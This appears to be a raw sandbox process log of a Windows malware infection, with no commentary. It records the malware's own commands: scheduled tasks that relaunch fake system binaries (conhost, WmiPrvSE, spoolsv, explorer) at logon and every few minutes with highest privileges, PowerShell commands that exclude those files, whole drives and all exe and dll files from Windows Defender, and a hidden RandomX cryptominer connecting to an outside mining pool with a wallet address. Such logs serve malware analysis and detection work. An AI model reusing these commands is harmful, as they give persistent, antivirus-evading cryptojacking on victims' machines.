schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\winNet\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\winNet\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /f
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\es-ES\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\sddsfsdf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "25272683852682421217750818191465220422-9407692802057673643-1748207935997404968"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3052900611401125956-484756809-446905200-241649272-9487792602012423663809889304"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-271828083-4359111451189210716-1289684993802507662-1364957067213309067794720591"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\ReadyBoot\explorer.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-961920636-98148811797934006976321607617681184272034308288-170282153-1921298572"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17658125455922931561755729633-139957246824629125618701358-956132470-1241721211"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DnAvjBEOV3.bat"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\Bloxstrap.exe
C:\Users\Admin\Bloxstrap.exe
C:\winNet\wscript.exe
"C:\winNet\wscript.exe"
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\A9jUK9Ae8C.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9039321941113196100-17247621085065542758533708-1634550024-1281521765-1306536162"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10458232041309704218-977340461-1780344133-86343893013835761481943200512-1196967907"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-159992700111601998421866752664-655342536248805395706532405-415879957-1927639054"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1868810344-2048948033666806126-43626291359636690543060264-744249752-158698289"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "556020493-644620438739739999-66581829111512784121609637097-815839047-163052952"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1104225558976001055-81118590965226475117268917871455293840-1939095154-500938075"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1678502449-437097632901073378-156327449315826618-12647697901638505465-533490980"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\taskeng.exe
taskeng.exe {D124F85A-5B27-40EC-BBC6-8D99248552CE} S-1-5-21-2958949473-3205530200-1453100116-1000:WHMFPZKA\Admin:Interactive:[1]
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\winNet\lsm.exe
C:\winNet\lsm.exe
C:\winNet\lsm.exe.exe
"C:\winNet\lsm.exe.exe"
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\winNet\spoolsv.exe
C:\winNet\spoolsv.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Users\All Users\Microsoft\eHome\wininit.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe"
C:\winNet\Bloxstrap.exe
C:\winNet\Bloxstrap.exe
C:\Windows\Offline Web Pages\Refcrt.exe
"C:\Windows\Offline Web Pages\Refcrt.exe"
C:\Windows\Offline Web Pages\Refcrt.exe.exe
"C:\Windows\Offline Web Pages\Refcrt.exe.exe"
C:\winNet\Bloxstrap.exe.exe
"C:\winNet\Bloxstrap.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\All Users\Microsoft\eHome\wininit.exe.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"
C:\winNet\Idle.exe
C:\winNet\Idle.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\Program Files\Windows Defender\es-ES\cmd.exe
"C:\Program Files\Windows Defender\es-ES\cmd.exe"
C:\Windows\Prefetch\ReadyBoot\explorer.exe
C:\Windows\Prefetch\ReadyBoot\explorer.exe
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe
"C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe"
C:\winNet\lsm.exe
C:\winNet\lsm.exe
C:\winNet\lsm.exe.exe
"C:\winNet\lsm.exe.exe"
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Admin\WmiPrvSE.exe
C:\Users\Admin\WmiPrvSE.exe
C:\winNet\lsass.exe
C:\winNet\lsass.exe
C:\winNet\lsass.exe.exe
"C:\winNet\lsass.exe.exe"
C:\Users\Default User\dllhost.exe
"C:\Users\Default User\dllhost.exe"
C:\Users\Admin\AppData\Local\csrss.exe
C:\Users\Admin\AppData\Local\csrss.exe
C:\DriversavessessionDlldhcp\dwm.exe
C:\DriversavessessionDlldhcp\dwm.exe
C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe"
C:\DriversavessessionDlldhcp\dwm.exe.exe
"C:\DriversavessessionDlldhcp\dwm.exe.exe"
C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe"
